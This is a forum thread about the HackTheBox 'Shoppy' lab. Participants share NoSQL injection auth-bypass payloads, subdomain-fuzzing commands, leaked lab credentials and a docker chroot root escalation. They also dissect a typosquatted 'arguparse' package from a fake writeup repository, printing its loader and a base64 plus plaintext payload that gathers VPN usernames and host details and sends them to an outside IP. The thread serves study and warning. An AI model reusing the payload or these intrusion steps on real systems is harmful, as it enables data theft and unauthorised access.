Posts: 0 Threads: 0 Joined: N/A September 18, 2022 at 12:56 PM (September 18, 2022, 10:19 AM)technic Wrote: (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain
1. this is NoSQL injection. you can check the web source codes after login as josh.
2. same NoSQL injection applies to search.
3. this is which i dislike most. of all the wordlists under SecLists/Discovery/DNS/, only 2 contains this subdomain, which are not in my frequently used wordlists for vhost enumeration. I just wonder how you guys get the user Josh? Did u guys fuzz the search parameter? Posts: 30 Threads: 0 Joined: N/A September 18, 2022 at 1:38 PM (September 17, 2022, 10:14 PM)elliotal Wrote: (September 17, 2022, 10:12 PM)wesleyjones001 Wrote: For those that are still stuck.
ssh [email protected]
Password: Sh0ppyBest@pp!
Mattermost user josh
Mattermost pass: remembermethisway
Josh hash: 6ebcea65320589ca4f2f1ce039975995
mattermost is a subdomain of shoppy.
need help with root sir (September 18, 2022, 12:56 PM)nhocit Wrote: (September 18, 2022, 10:19 AM)technic Wrote: (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain
1. this is NoSQL injection. you can check the web source codes after login as josh.
2. same NoSQL injection applies to search.
3. this is which i dislike most. of all the wordlists under SecLists/Discovery/DNS/, only 2 contains this subdomain, which are not in my frequently used wordlists for vhost enumeration.
I just wonder how you guys get the user Josh? Did u guys fuzz the search parameter? I did. I used a list from Seclists (/Usernames/Names/names.txt) and found it this way through burpsuite intruder. You can also do that with wfuzz or fuff. I get it now and I feel dumb because once on the box I poked around mongodb, should've connected the dots on why that payload worked, wasn't SQLi but NoSQLi... Thanks for the explaining Posts: 53 Threads: 0 Joined: N/A September 18, 2022 at 1:39 PM (September 18, 2022, 12:56 PM)nhocit Wrote: (September 18, 2022, 10:19 AM)technic Wrote: (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain
1. this is NoSQL injection. you can check the web source codes after login as josh.
2. same NoSQL injection applies to search.
3. this is which i dislike most. of all the wordlists under SecLists/Discovery/DNS/, only 2 contains this subdomain, which are not in my frequently used wordlists for vhost enumeration.
I just wonder how you guys get the user Josh? Did u guys fuzz the search parameter? put the SQL payload in search field and you will get it all users. Posts: 5 Threads: 0 Joined: N/A September 19, 2022 at 4:22 AM (September 18, 2022, 07:57 AM)nhocit Wrote: (September 18, 2022, 07:47 AM)WhiteWolf9007 Wrote: (September 18, 2022, 05:47 AM)br4v0ch4rl33 Wrote: (September 18, 2022, 03:41 AM)RF0vmM9n87Go Wrote: WOW, really didnt like this box.
Wondering how you guys sniffed out a couple things:
1. the auth bypass - I tried manually and sqlmap to no avail but was hit with 504s.
2. the josh user in export - after the fact I ran a wfuzz on that endpoint with xato wordlist to find it (is that how?)
3. the mattermost subdomain
Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
(September 18, 2022, 05:42 AM)WhiteWolf9007 Wrote: (September 18, 2022, 03:02 AM)7r4c3 Wrote: SSH into jaeger:Sh0ppyBest@pp!
Do cd ~
Then,
sudo /home/deploy/password-manager -u 'deploy'
Now read the creds
And SSH as deploy
using gtfo we have
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
rooted!! (:
mine is showing that user jaeger is not allowed to execute this as root.
sudo -u deploy /home/deploy/password-manager
where did u get the master password for this ? and also how u knew this command like sudo -l has this access but the recon after that
This way:
cat /home/deploy/password-manager
U will see: Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
Pay attention to this: Access Denided is logging in deny. Before that, it tried to read creds.txt. So We see Access granted is logging in success. So 'Sample' is the master password! ohhhk great i thought sample access is like demo instance of something. , thanks buddy Posts: 213 Threads: 0 Joined: N/A September 19, 2022 at 8:15 AM FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware. requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183. Posts: 2 Threads: 0 Joined: N/A September 19, 2022 at 12:12 PM (September 19, 2022, 08:15 AM)Exa Wrote: FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware.
requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183. Good spot. I reported this to DigitalOcean yesterday. I wanted to see how other people had approached the box after finishing it myself, and found this. Did not look too far into it, however I compared it to the original argparse and it does not look to do much more than send a GET out to the above mentioned IP I will run this in an analysis environment later today as it has caught my interest. Posts: 213 Threads: 0 Joined: N/A September 19, 2022 at 12:42 PM (September 19, 2022, 12:12 PM)lyvellas Wrote: (September 19, 2022, 08:15 AM)Exa Wrote: FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware.
requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183.
Good spot. I reported this to DigitalOcean yesterday.
I wanted to see how other people had approached the box after finishing it myself, and found this. Did not look too far into it, however I compared it to the original argparse and it does not look to do much more than send a GET out to the above mentioned IP
I will run this in an analysis environment later today as it has caught my interest. I'm trying to figure out whether the response from the GET request gets executed. Regardless, I'm running into a timeout when trying to contact https://161.35.125.183. Seems like the malicious web server is not online anymore/at the moment. There was another malicious Github link a few days ago (HTB Sekhmet discussion). The payload (also retrieved from a web server) sent a message to Discord titled wall of shame. Posts: 16 Threads: 0 Joined: N/A September 19, 2022 at 12:53 PM (September 19, 2022, 12:12 PM)lyvellas Wrote: (September 19, 2022, 08:15 AM)Exa Wrote: FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware.
requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183.
Good spot. I reported this to DigitalOcean yesterday.
I wanted to see how other people had approached the box after finishing it myself, and found this. Did not look too far into it, however I compared it to the original argparse and it does not look to do much more than send a GET out to the above mentioned IP
I will run this in an analysis environment later today as it has caught my interest. Off-topic but running a local version like this: diff /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.2/Lib/argparse.py ~/Web/Trash/arguparse-1.3/arguparse.py shows a lot of differences. Looking at the function names that have been implemented it loads code from the GET request to execute it locally with some kind of interpreter. def _loads(z, /, *, fix_imports=True, encoding="ASCII", errors="strict",
buffers=None):
s = base64.b64decode(z.text)
if isinstance(s, str):
raise TypeError("Can't load hem from unicode string")
file = io.BytesIO(s)
return _Unhemr(file, fix_imports=fix_imports, buffers=buffers,
encoding=encoding, errors=errors).load()
Something with about a HEM protocol? Can't really find anything about it. Was trying to get the base64 from the URL but can't access the site anymore. Posts: 15 Threads: 0 Joined: N/A September 19, 2022 at 3:26 PM (September 19, 2022, 12:42 PM)Exa Wrote: (September 19, 2022, 12:12 PM)lyvellas Wrote: (September 19, 2022, 08:15 AM)Exa Wrote: FYI, the other forum thread "Writeup Shoppy Machine Hackthebox" contains malware.
requirements.txt from https://github.com/mikeygains/shoppy_hackthebox_writeup contains arguparse (not argparse). arguparse.py contains:
a="161."
g="35.125"
v=".183"
i=f"{a}{g}{v}"
There is some kind of hidden connection made to 161.35.125.183.
Good spot. I reported this to DigitalOcean yesterday.
I wanted to see how other people had approached the box after finishing it myself, and found this. Did not look too far into it, however I compared it to the original argparse and it does not look to do much more than send a GET out to the above mentioned IP
I will run this in an analysis environment later today as it has caught my interest.
I'm trying to figure out whether the response from the GET request gets executed.
Regardless, I'm running into a timeout when trying to contact https://161.35.125.183. Seems like the malicious web server is not online anymore/at the moment.
There was another malicious Github link a few days ago (HTB Sekhmet discussion). The payload (also retrieved from a web server) sent a message to Discord titled wall of shame. Site is online. It serves the following Base64 encoded python. It looks for a HackTheBox VPN config file and then extracts some information including the username import platform, requests, os, glob, pwd
try:
os.chdir('/home/')
hackthebox = False
for file in glob.glob('**/*.ovpn', recursive=True):
hackthebox, htbfound = False, False
for line in open(f'/home/{file}','r').readlines():
if "CN=HackTheBox" in line: htbfound = True
if "Subject: CN=" in line:
if htbfound:
hackthebox = line.split("Subject: CN=")[1].strip()
if hackthebox: break
except:
exit
try:os_username = pwd.getpwuid(os.getuid())[0]
except:os_name = "null"
try:os_hostname = platform.node()
except:os_hostname = "null"
try:os_version = platform.release()
except:os_version = "null"
try:os_type = platform.system()
except:os_type = "null"
try:
requests.get('https://161.35.125.183:443/favicon.ico', headers={
'api-token': 'a2e3bb0d292f9ef00a69df1ede854390545229fd0e32b8c5470c36744737e056',
'htb-username': hackthebox,
'os-username': os.getlogin(),
'os-hostname': platform.node(),
'os-version': platform.release(),
'os-type': platform.system()
}, verify=False)
except:
exit
gASVHQQAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlFj+AwAAaW1wb3J0IHBsYXRmb3JtLCByZXF1ZXN0cywgb3MsIGdsb2IsIHB3ZAp0cnk6Cglvcy5jaGRpcignL2hvbWUvJykKCWhhY2t0aGVib3ggPSBGYWxzZQoJZm9yIGZpbGUgaW4gZ2xvYi5nbG9iKCcqKi8qLm92cG4nLCByZWN1cnNpdmU9VHJ1ZSk6CgkJaGFja3RoZWJveCwgaHRiZm91bmQgPSBGYWxzZSwgRmFsc2UKCQlmb3IgbGluZSBpbiBvcGVuKGYnL2hvbWUve2ZpbGV9JywncicpLnJlYWRsaW5lcygpOgoJCQlpZiAiQ049SGFja1RoZUJveCIgaW4gbGluZTogaHRiZm91bmQgPSBUcnVlCgkJCWlmICJTdWJqZWN0OiBDTj0iIGluIGxpbmU6IAoJCQkJaWYgaHRiZm91bmQ6CgkJCQkJaGFja3RoZWJveCA9IGxpbmUuc3BsaXQoIlN1YmplY3Q6IENOPSIpWzFdLnN0cmlwKCkKCgkJaWYgaGFja3RoZWJveDogYnJlYWsKZXhjZXB0OgoJZXhpdAoKdHJ5Om9zX3VzZXJuYW1lID0gcHdkLmdldHB3dWlkKG9zLmdldHVpZCgpKVswXQpleGNlcHQ6b3NfbmFtZSA9ICJudWxsIgp0cnk6b3NfaG9zdG5hbWUgPSBwbGF0Zm9ybS5ub2RlKCkKZXhjZXB0Om9zX2hvc3RuYW1lID0gIm51bGwiCnRyeTpvc192ZXJzaW9uID0gcGxhdGZvcm0ucmVsZWFzZSgpCmV4Y2VwdDpvc192ZXJzaW9uID0gIm51bGwiCnRyeTpvc190eXBlID0gcGxhdGZvcm0uc3lzdGVtKCkKZXhjZXB0Om9zX3R5cGUgPSAibnVsbCIKCnRyeToKCXJlcXVlc3RzLmdldCgnaHR0cHM6Ly8xNjEuMzUuMTI1LjE4Mzo0NDMvZmF2aWNvbi5pY28nLCBoZWFkZXJzPXsKCQknYXBpLXRva2VuJzogJ2EyZTNiYjBkMjkyZjllZjAwYTY5ZGYxZWRlODU0MzkwNTQ1MjI5ZmQwZTMyYjhjNTQ3MGMzNjc0NDczN2UwNTYnLAoJCSdodGItdXNlcm5hbWUnOiBoYWNrdGhlYm94LAoJCSdvcy11c2VybmFtZSc6IG9zLmdldGxvZ2luKCksCgkJJ29zLWhvc3RuYW1lJzogcGxhdGZvcm0ubm9kZSgpLAoJCSdvcy12ZXJzaW9uJzogcGxhdGZvcm0ucmVsZWFzZSgpLAoJCSdvcy10eXBlJzogcGxhdGZvcm0uc3lzdGVtKCkKCQl9LCB2ZXJpZnk9RmFsc2UpCmV4Y2VwdDoKCWV4aXSUhZRSlC4=
Posts: 21 Threads: 0 Joined: N/A September 19, 2022 at 6:23 PM (September 17, 2022, 08:00 PM)xurka Wrote: (September 17, 2022, 07:53 PM)elliotal Wrote: if you put username' in the username field, the server couldnt proccess it for some reason
there is injection there that bring us as admin:
admin'||''==='
then we search the same username and get all users hashes
but hashes are uncrackable Hello I was just asking how were you able to figure out that this is the appropriate payload for use. |
